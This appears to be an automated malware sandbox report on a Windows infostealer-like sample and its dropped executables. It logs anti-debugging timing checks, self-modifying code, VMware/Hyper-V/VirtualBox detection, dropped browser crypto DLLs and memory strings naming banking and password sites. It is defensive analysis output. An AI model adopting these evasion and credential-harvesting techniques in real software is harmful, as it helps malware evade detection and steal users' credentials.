Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96D9D9 second address: 96DA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnl 00007F28C4758076h 0x00000011 jmp 00007F28C475807Bh 0x00000016 jmp 00007F28C4758081h 0x0000001b popad 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96DA0B second address: 96DA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96DA11 second address: 96DA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E014 second address: 96E01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E01A second address: 96E02A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F28C4758076h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E02A second address: 96E051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F28C47EE2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F28C47EE2C6h 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E051 second address: 96E059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E1D6 second address: 96E1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E1DB second address: 96E1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E1E1 second address: 96E1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 975FA3 second address: 975FBB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F28C4758076h 0x00000012 ja 00007F28C4758076h 0x00000018 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5DF899 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7820D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5DD612 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 80E83F instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Special instruction interceptor: First address: 78EE9B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Special instruction interceptor: First address: 938DEE instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Special instruction interceptor: First address: 95BB2B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Special instruction interceptor: First address: 78EDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Special instruction interceptor: First address: 9C7D33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 104EE9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11F8DEE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 121BB2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 104EDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 1287D33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Special instruction interceptor: First address: 847CF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Special instruction interceptor: First address: A17593 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Special instruction interceptor: First address: 847BE2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Special instruction interceptor: First address: 9F8A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: C6EB0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: DEBB8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: E12138 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: E189E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Special instruction interceptor: First address: 29F899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Special instruction interceptor: First address: 4420D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Special instruction interceptor: First address: 29D612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Special instruction interceptor: First address: 4CE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: A1DB18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: A1DBFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: BBC4AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: BBAC3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: A1B536 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: BC47C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 5EBF899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 60620D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 5EBD612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 60EE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: A20701 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Special instruction interceptor: First address: A20A55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 658F899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 67320D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 658D612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Special instruction interceptor: First address: 67BE83F instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Memory allocated: 4F90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Memory allocated: 5230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Memory allocated: 7230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Memory allocated: 5120000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Memory allocated: 5190000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Memory allocated: 7190000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsECAFHIIJJE.exe

Code function: 20_2_04C00C4B rdtsc

20_2_04C00C4B

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1621
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 456
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6356
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3353
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4345
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5514

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.3 %

Source: C:\Users\user\Desktop\file.exe TID: 6364	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6360	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5968	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9188	Thread sleep count: 323 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9188	Thread sleep time: -646323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9168	Thread sleep count: 1621 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9168	Thread sleep time: -3243621s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156	Thread sleep count: 456 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156	Thread sleep time: -13680000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8956	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180	Thread sleep count: 1579 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180	Thread sleep time: -3159579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe TID: 8776	Thread sleep time: -210000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 6580	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe TID: 1896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 3668	Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 8156	Thread sleep time: -72000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe TID: 3528	Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe TID: 3528	Thread sleep time: -396000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe TID: 3660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 7516	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\DocumentsECAFHIIJJE.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C63C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

0_2_6C63C930

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: powershell.exe, 00000019.00000002.2934398498.0000000008374000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}J
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\]q
Source: skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASSOCIATORS OF {\\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""} WHERE AssocClass = MSFT_DiskToPartition ResultClass = MSFT_Disk ResultRole = Disk Role = Partition
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Vand (@('ByTargetPort') -cMSFT_NetEventVmNetworkAdatper.format.ps1xmlocia
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D18000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Disk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:DI:\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"
Source: file.exe, 00000000.00000002.2412929391.0000000001122000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2412929391.00000000010F2000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.000000000128E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2866249485.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000019.00000002.2935729480.00000000083A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareESXi
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware0
Source: powershell.exe, 00000019.00000002.2933297668.00000000082C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AccessRightFullModifyReadCustomStorageTierClassMicrosoft.PowerShell.Cmdletization.GeneratedTypes.FileStorageTierCapacityPerformancePinnedStatePinnedUnpinnedAllTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.InitiatorIdPortWWNNodeWWNHostnameiSCSINameSwitchWWNSASAddressHostTypeStandardSolarisHPUXOpenVMSTru64NetwareSequentAIXDGUXDynixIrixCiscoISCSIStorageRouterLinuxMicrosoftWindowsOS400TRESPASSHIUXVMwareESXiMicrosoftWindowsServer2008MicrosoftWindowsServer2003PortTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.InitiatorPortNotPresentFabricPublicLoopFLPortFabricPortFabricExpansionPortGenericFabricPortPrivateLoopPointToPointConnectionTypeOperationalUserOfflineBypassedInDiagnosticsModeLinkDownPortErrorLoopbackMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MaskingSetDeviceAccessMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MaskingSet.AddVirtualDiskNoAccessParityLayout52110.111Z0
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: powershell.exe, 00000019.00000002.2934439928.000000000837B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\]q
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <Value Name="VMwareESXi" Value="19" />
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP_
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: powershell.exe, 00000019.00000002.2917317847.0000000006E41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Partition.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"-
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware<6
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000017.00000002.3291976640.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, file1.exe, 00000018.00000002.2876972921.00000000009CE000.00000040.00000001.01000000.0000000F.sdmp, 4136f86ac7.exe, 0000001E.00000002.3116078239.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp, 4136f86ac7.exe, 0000001E.00000002.3129252471.0000000006044000.00000040.00000800.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2927433701.0000000000424000.00000040.00000001.01000000.00000013.sdmp, 0ac2a0f3ae.exe, 00000024.00000002.3120888781.0000000000B9D000.00000040.00000001.01000000.00000019.sdmp, 4136f86ac7.exe, 00000025.00000002.3258230937.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
